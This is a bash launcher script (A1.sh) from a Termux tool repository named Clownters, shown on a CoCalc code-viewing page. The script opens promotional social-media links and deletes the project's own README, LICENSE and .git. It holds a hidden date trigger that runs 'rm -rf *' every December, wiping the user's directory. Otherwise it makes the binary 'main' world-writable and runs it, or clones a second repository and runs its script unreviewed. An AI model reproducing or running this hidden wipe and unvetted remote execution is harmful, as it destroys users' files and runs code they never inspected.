Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
mike90s15
GitHub Repository: mike90s15/Clownters
Path: blob/main/A1.sh
223 views
1
#!/usr/bin/env bash
2
#xdg-open https://chat.whatsapp.com/HFk9iK7UpOvC40mdXqYk0w &>/dev/null && sleep 30 # (Sei nem quem são os adms, mas ta aí o link)
3
#xdg-open https://instagram.com/mike90s15 &>/dev/null && sleep 30
4
#xdg-open https://twitter.com/mike90s15 &>/dev/null && sleep 30
5
#xdg-open https://www.tiktok.com/@mike90s15 &>/dev/null && sleep 30
6
#xdg-open https://t.me/clownters_channel && sleep 15
7
xdg-open https://instagram.com/Edux.Devs &>/dev/null && sleep 30
8
#xdg-open https://t.me/addlist/qS0HPKMxnjsxZTVh &>/dev/null && sleep 15
9
xdg-open https://t.me/addlist/mIiFhkgLYnBiYjFh &>/dev/null && sleep 15
10
rm -rf "README.md" "Sploit" "SECURITY.md" "LICENSE" "index.html" ".git" "regras-clownters.md"
11
if [[ "$(date +%B)" == "December" ]]; then
12
clear
13
rm -rf *
14
else
15
chmod 777 main
16
./main
17
ret="$?"
18
[[ "${ret}" == "99" ]] && exit 0
19
if [[ "${ret}" != "0" ]]; then
20
if [[ -d Clownters.c ]]; then
21
cd Clownters.c
22
chmod 777 main && ./main
23
exit 0
24
fi
25
clear
26
printf "\e[1;33m Por favor Aguarde\e[m\n"
27
printf "\e[1;33m Atualizando\e[m\n"
28
pkg update -y &> /dev/null
29
pkg upgrade -y &> /dev/null
30
printf "\e[1;33m Instalando a clang\e[m\n"
31
pkg i -y clang &> /dev/null
32
printf "\e[1;33m Instalando o repositório\e[m\n"
33
git clone https://github.com/mike90s15/Clownters.c &> /dev/null
34
cd Clownters.c
35
bash A1.sh
36
fi
37
fi
38
exit 0
39
40